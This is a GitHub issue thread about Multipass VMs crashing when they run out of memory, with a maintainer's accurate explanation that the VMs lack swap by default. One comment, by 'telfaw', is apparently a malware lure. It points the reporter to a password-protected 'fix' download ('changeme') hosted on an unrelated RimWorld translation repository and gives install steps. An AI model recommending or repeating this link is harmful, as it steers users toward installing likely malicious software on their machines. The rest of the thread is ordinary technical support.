### ISSUE TITLE
multipass can't use virtual memory on Windows, crashing when running out of memory

### ISSUE THREAD

**Issue by cczw123** [canonical/multipass#3651]
**Describe the bug**
multipass ubuntu 24.04 lts can't use virtual memory. It will just crash when the virtual machine run out of assigned memory.

**To Reproduce**
How, and what happened?
1. using ubuntu 24.04 lts.
2. use "make" to build a kernel. When the memory is exhausted, the app stopped running and become inactive. 

**Expected behavior**
What did you expect to happen?
The machine should never go down. It should use disk image as virtual memory.

**Logs**
Please provide logs from the daemon, see [accessing logs](https://multipass.run/docs/accessing-logs) on where to find them on your platform.
I have already uninstalled it because of this problem.

**Additional info**
 - OS: [e.g. macOS 10.15]
- `multipass version` 
- `multipass info`
- `multipass get local.driver`
Just downloaded from the website on 8/26. Should be the newest.
**Additional context**

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ricab** [comment]
Hi @cczw123, virtual memory on a Linux system cannot extend beyond physical memory without a swap partition or swap file, which Multipass VMs don't have by default. You can setup a swap file inside the instance if you want, but you might as well just allocate more memory to the VM and use swap on your host as needed (or whichever analogous mechanism the host OS uses to swap pages to disk).

Note that relying heavily on disk will make things run much slower. This depends on actual hardware, but you can expect disk read/write to be around 1 order of magnitude slower then memory, with latency being 3 or more orders of magnitude slower.
